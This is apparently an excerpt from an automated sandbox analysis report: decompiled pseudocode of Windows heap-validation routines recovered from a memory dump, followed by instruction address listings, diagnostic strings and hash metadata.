							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E018ED540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E0189B150();
								} else {
									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0195A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E018BE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0195A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E018BE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E018BA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E018BA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E018BBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E019423E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E01891F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                  0x01954af7
                                  0x01954afb
                                  0x01954afd
                                  0x01954b01
                                  0x01954b03
                                  0x01954b08
                                  0x01954b0a
                                  0x01954b0f
                                  0x01954eb5
                                  0x01954eb5
                                  0x01954ebb
                                  0x019550d5
                                  0x019550d8
                                  0x01954ff6
                                  0x00000000
                                  0x01954ff6
                                  0x019550de
                                  0x019550e4
                                  0x019550e8
                                  0x01955107
                                  0x0195510c
                                  0x019550ea
                                  0x019550ff
                                  0x01955104
                                  0x01955112
                                  0x01955115
                                  0x01955118
                                  0x01955119
                                  0x019550cb
                                  0x019550cb
                                  0x019550af
                                  0x00000000
                                  0x019550af
                                  0x01954ecb
                                  0x019550b6
                                  0x019550bb
                                  0x01954ed1
                                  0x01954ee6
                                  0x01954eeb
                                  0x019550c1
                                  0x019550c2
                                  0x019550c5
                                  0x019550c6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01954b15
                                  0x01954b15
                                  0x01954b1c
                                  0x01954b1e
                                  0x01954b23
                                  0x01954b27
                                  0x01954b33
                                  0x01954b38
                                  0x01954b3a
                                  0x01954b3c
                                  0x01954b41
                                  0x01954b41
                                  0x01954b3a
                                  0x01954b52
                                  0x01955045
                                  0x0195504b
                                  0x0195504f
                                  0x0195506e
                                  0x01955073
                                  0x01955051
                                  0x01955066
                                  0x0195506b
                                  0x01955083
                                  0x01955088
                                  0x01955088
                                  0x0195508a
                                  0x01955091
                                  0x01955099
                                  0x01955099
                                  0x0195509d
                                  0x019550a7
                                  0x019550ad
                                  0x019550ad
                                  0x019550ad
                                  0x00000000
                                  0x0195509d
                                  0x01954b58
                                  0x01954b5b
                                  0x01954b5e
                                  0x01954b63
                                  0x01954b66
                                  0x01954b69
                                  0x01954b6f
                                  0x01954be4
                                  0x01954bf0
                                  0x01954bf2
                                  0x01954bf5
                                  0x01954dc3
                                  0x01954dc6
                                  0x01954dc9
                                  0x01954dce
                                  0x01954dce
                                  0x01954dd0
                                  0x01954dd0
                                  0x01954dd5
                                  0x01954def
                                  0x01954dd7
                                  0x01954de7
                                  0x01954de7
                                  0x01954df3
                                  0x01955001
                                  0x01955007
                                  0x0195500b
                                  0x0195502a
                                  0x0195502f
                                  0x0195500d
                                  0x01955022
                                  0x01955027
                                  0x01955039
                                  0x0195503a
                                  0x0195503b
                                  0x00000000
                                  0x01954df9
                                  0x01954dfd
                                  0x01954e90
                                  0x01954e94
                                  0x01954e9e
                                  0x01954ea4
                                  0x01954ea4
                                  0x01954ea4
                                  0x01954ea6
                                  0x01954ea6
                                  0x00000000
                                  0x01954ea6
                                  0x01954e03
                                  0x01954e08
                                  0x01954f88
                                  0x01954f92
                                  0x01954f99
                                  0x01954f9c
                                  0x01954fe0
                                  0x01954fe4
                                  0x01954fee
                                  0x01954ff4
                                  0x01954ff4
                                  0x01954ff4
                                  0x00000000
                                  0x01954fe4
                                  0x01954f9e
                                  0x01954fa4
                                  0x01954fa8
                                  0x01954fc7
                                  0x01954fcc
                                  0x01954faa
                                  0x01954fbf
                                  0x01954fc4
                                  0x01954fd2
                                  0x01954fd5
                                  0x01954fd6
                                  0x01954f34
                                  0x01954f34
                                  0x00000000
                                  0x01954f39
                                  0x01954e0e
                                  0x01954e14
                                  0x01954e1b
                                  0x01954e25
                                  0x01954e2b
                                  0x01954e2b
                                  0x01954e33
                                  0x01954e38
                                  0x01954e8a
                                  0x01954e8a
                                  0x00000000
                                  0x01954e3a
                                  0x01954e3e
                                  0x01954e43
                                  0x01954e47
                                  0x01954e53
                                  0x01954e58
                                  0x01954e5a
                                  0x01954e5c
                                  0x01954e61
                                  0x01954e61
                                  0x01954e5a
                                  0x01954e6e
                                  0x01954f41
                                  0x01954f47
                                  0x01954f4b
                                  0x01954f6a
                                  0x01954f6f
                                  0x01954f4d
                                  0x01954f62
                                  0x01954f67
                                  0x01954f7f
                                  0x01954f80
                                  0x01954f81
                                  0x00000000
                                  0x01954e74
                                  0x01954e78
                                  0x01954e82
                                  0x01954e88
                                  0x01954e88
                                  0x00000000
                                  0x01954e78
                                  0x01954e6e
                                  0x01954e38
                                  0x01954df3
                                  0x01954bfe
                                  0x01954c01
                                  0x01954c04
                                  0x01954c07
                                  0x01954c09
                                  0x01954c0c
                                  0x01954c0e
                                  0x01954c0e
                                  0x01954c11
                                  0x01954c11
                                  0x01954c0c
                                  0x01954c14
                                  0x01954c17
                                  0x01954dae
                                  0x01954db2
                                  0x01954db7
                                  0x01954dba
                                  0x01954dbd
                                  0x01954ef1
                                  0x01954ef7
                                  0x01954efb
                                  0x01954f1a
                                  0x01954f1f
                                  0x01954efd
                                  0x01954f12
                                  0x01954f17
                                  0x01954f2b
                                  0x01954f2b
                                  0x01954f2d
                                  0x01954f2e
                                  0x01954f2f
                                  0x00000000
                                  0x01954f2f
                                  0x00000000
                                  0x01954c1d
                                  0x01954c1d
                                  0x01954c20
                                  0x01954c23
                                  0x01954c26
                                  0x01954c29
                                  0x01954c2c
                                  0x01954c2e
                                  0x01954d91
                                  0x01954d91
                                  0x01954d92
                                  0x01954d97
                                  0x01954d9e
                                  0x00000000
                                  0x01954d9e
                                  0x01954c34
                                  0x01954c37
                                  0x01954c39
                                  0x01954c3c
                                  0x00000000
                                  0x00000000
                                  0x01954c45
                                  0x01954c48
                                  0x01954c4e
                                  0x01954c50
                                  0x01954c78
                                  0x01954c78
                                  0x01954c7b
                                  0x01954c7d
                                  0x01954c80
                                  0x01954c84
                                  0x01954cad
                                  0x01954cad
                                  0x01954cb0
                                  0x01954cb8
                                  0x01954cbb
                                  0x01954cbe
                                  0x01954cc1
                                  0x01954cc7
                                  0x01954cdc
                                  0x01954cc9
                                  0x01954cd2
                                  0x01954cd4
                                  0x01954cd4
                                  0x01954cde
                                  0x01954ce0
                                  0x01954d13
                                  0x01954d13
                                  0x01954d16
                                  0x01954d18
                                  0x01954d29
                                  0x01954d2a
                                  0x01954d2c
                                  0x01954d34
                                  0x01954d1a
                                  0x01954d1a
                                  0x01954d1a
                                  0x01954d1d
                                  0x01954d1f
                                  0x01954d22
                                  0x01954d24
                                  0x01954d24
                                  0x01954d3c
                                  0x01954d3f
                                  0x01954d45
                                  0x01954d47
                                  0x01954d6c
                                  0x01954d6c
                                  0x01954d70
                                  0x01954d7e
                                  0x01954d84
                                  0x01954d84
                                  0x00000000
                                  0x01954d49
                                  0x01954d49
                                  0x01954d56
                                  0x01954d56
                                  0x01954d59
                                  0x00000000
                                  0x00000000
                                  0x01954d4e
                                  0x01954d50
                                  0x01954d52
                                  0x01954d8e
                                  0x01954d5d
                                  0x01954d5f
                                  0x01954d67
                                  0x00000000
                                  0x01954d67
                                  0x01954d54
                                  0x01954d54
                                  0x01954d5b
                                  0x00000000
                                  0x01954d5b
                                  0x01954ce2
                                  0x01954ce2
                                  0x01954ce5
                                  0x01954ce5
                                  0x01954ce7
                                  0x01954cfb
                                  0x01954ce9
                                  0x01954ce9
                                  0x01954cec
                                  0x01954cef
                                  0x01954cf1
                                  0x01954cf3
                                  0x01954cf3
                                  0x01954cf3
                                  0x01954cf6
                                  0x01954cf6
                                  0x01954d02
                                  0x01954d05
                                  0x00000000
                                  0x00000000
                                  0x01954d07
                                  0x01954d0f
                                  0x01954d11
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01954d11
                                  0x00000000
                                  0x01954ce5
                                  0x01954ce0
                                  0x01954c8a
                                  0x01954c8f
                                  0x01954c91
                                  0x00000000
                                  0x00000000
                                  0x01954c9d
                                  0x00000000
                                  0x01954c9d
                                  0x01954c52
                                  0x01954c5f
                                  0x01954c5f
                                  0x01954c62
                                  0x00000000
                                  0x00000000
                                  0x01954c57
                                  0x01954c59
                                  0x01954c5b
                                  0x01954caa
                                  0x01954c66
                                  0x01954c68
                                  0x01954c70
                                  0x01954c75
                                  0x00000000
                                  0x01954c75
                                  0x01954c5d
                                  0x01954c5d
                                  0x01954c64
                                  0x00000000
                                  0x01954c64
                                  0x01954c17
                                  0x01954b75
                                  0x01954bc4
                                  0x01954bc8
                                  0x00000000
                                  0x00000000
                                  0x01954bd9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01954b77
                                  0x01954b7a
                                  0x01954b8c
                                  0x01954b7c
                                  0x01954b7e
                                  0x01954b83
                                  0x01954b86
                                  0x01954b86
                                  0x01954b90
                                  0x01954b93
                                  0x00000000
                                  0x00000000
                                  0x01954b95
                                  0x01954bab
                                  0x01954bb0
                                  0x00000000
                                  0x00000000
                                  0x01954bb2
                                  0x01954bb9
                                  0x00000000
                                  0x00000000
                                  0x01954bbb
                                  0x01954bbe
                                  0x01954bc1
                                  0x01954bc1
                                  0x00000000
                                  0x01954bc1
                                  0x01954b97
                                  0x01954ba4
                                  0x00000000
                                  0x00000000
                                  0x01954ba6
                                  0x00000000
                                  0x01954ba6
                                  0x01954ea9
                                  0x01954ea9
                                  0x01954eb2
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                  • API String ID: 0-3591852110
                                  • Opcode ID: abf9ad43c3e1450ca78a26f9b51caba3b7ce5679fbc0ded930d9fc91bd85612a
                                  • Instruction ID: 78e2ecf5d29acc599fe09f6f734427792549d1e7ed50bda911d35d0d56e8f175
                                  • Opcode Fuzzy Hash: abf9ad43c3e1450ca78a26f9b51caba3b7ce5679fbc0ded930d9fc91bd85612a
                                  • Instruction Fuzzy Hash: 4E12E3706006429FEBA5DF2DC484BBABBF5FF44701F148859E88A9B741E774E980CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01954496, Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 56%
                                  			E01954496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E019549A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x1986378 = _t267;
						asm("int3");
						 *0x1986378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E018C174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E0189B150();
							} else {
								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E0189B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E0189B150();
							} else {
								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E0189B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x1986350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E018D9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E018C174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E0189B150();
										} else {
											E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E0189B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E0189B150();
									} else {
										E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E0189B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E0189B150();
								} else {
									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E0189B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E0189B150();
							} else {
								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01954AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0194FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E019423E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                  0x019544a1
                                  0x019544a3
                                  0x019544a7
                                  0x019544ac
                                  0x019544af
                                  0x019544b2
                                  0x019544b9
                                  0x019544bc
                                  0x019547f2
                                  0x019547f2
                                  0x019547f8
                                  0x019547fc
                                  0x019547fe
                                  0x01954804
                                  0x01954805
                                  0x01954805
                                  0x0195480c
                                  0x01954810
                                  0x01954812
                                  0x01954812
                                  0x01954812
                                  0x01954822
                                  0x01954822
                                  0x01954827
                                  0x01954827
                                  0x00000000
                                  0x01954827
                                  0x019544c4
                                  0x019544d3
                                  0x019544d9
                                  0x019544dc
                                  0x019544de
                                  0x019544e0
                                  0x01954560
                                  0x01954520
                                  0x01954522
                                  0x01954525
                                  0x01954528
                                  0x0195452b
                                  0x0195452e
                                  0x01954530
                                  0x01954697
                                  0x0195469d
                                  0x019546a1
                                  0x019546c0
                                  0x019546c5
                                  0x019546a3
                                  0x019546b8
                                  0x019546bd
                                  0x019546cb
                                  0x019546d4
                                  0x01954677
                                  0x01954677
                                  0x01954679
                                  0x0195467c
                                  0x0195468a
                                  0x01954690
                                  0x01954690
                                  0x019547f1
                                  0x019547f1
                                  0x019547f1
                                  0x00000000
                                  0x019547f1
                                  0x01954536
                                  0x01954539
                                  0x0195453c
                                  0x01954636
                                  0x0195463c
                                  0x01954640
                                  0x0195465f
                                  0x01954664
                                  0x01954642
                                  0x01954657
                                  0x0195465c
                                  0x01954670
                                  0x00000000
                                  0x01954542
                                  0x01954542
                                  0x01954546
                                  0x01954548
                                  0x0195454b
                                  0x01954555
                                  0x0195455b
                                  0x0195455b
                                  0x0195455b
                                  0x0195455d
                                  0x0195455d
                                  0x0195455d
                                  0x00000000
                                  0x0195455d
                                  0x0195453c
                                  0x01954579
                                  0x0195457c
                                  0x01954587
                                  0x01954589
                                  0x01954591
                                  0x01954592
                                  0x01954597
                                  0x01954598
                                  0x019545a1
                                  0x019545ab
                                  0x019545ab
                                  0x019545a1
                                  0x019545ae
                                  0x019545b4
                                  0x019545b9
                                  0x019545bd
                                  0x01954759
                                  0x01954759
                                  0x0195475f
                                  0x01954761
                                  0x01954763
                                  0x01954765
                                  0x01954768
                                  0x0195476b
                                  0x0195476d
                                  0x0195479c
                                  0x0195479c
                                  0x0195479f
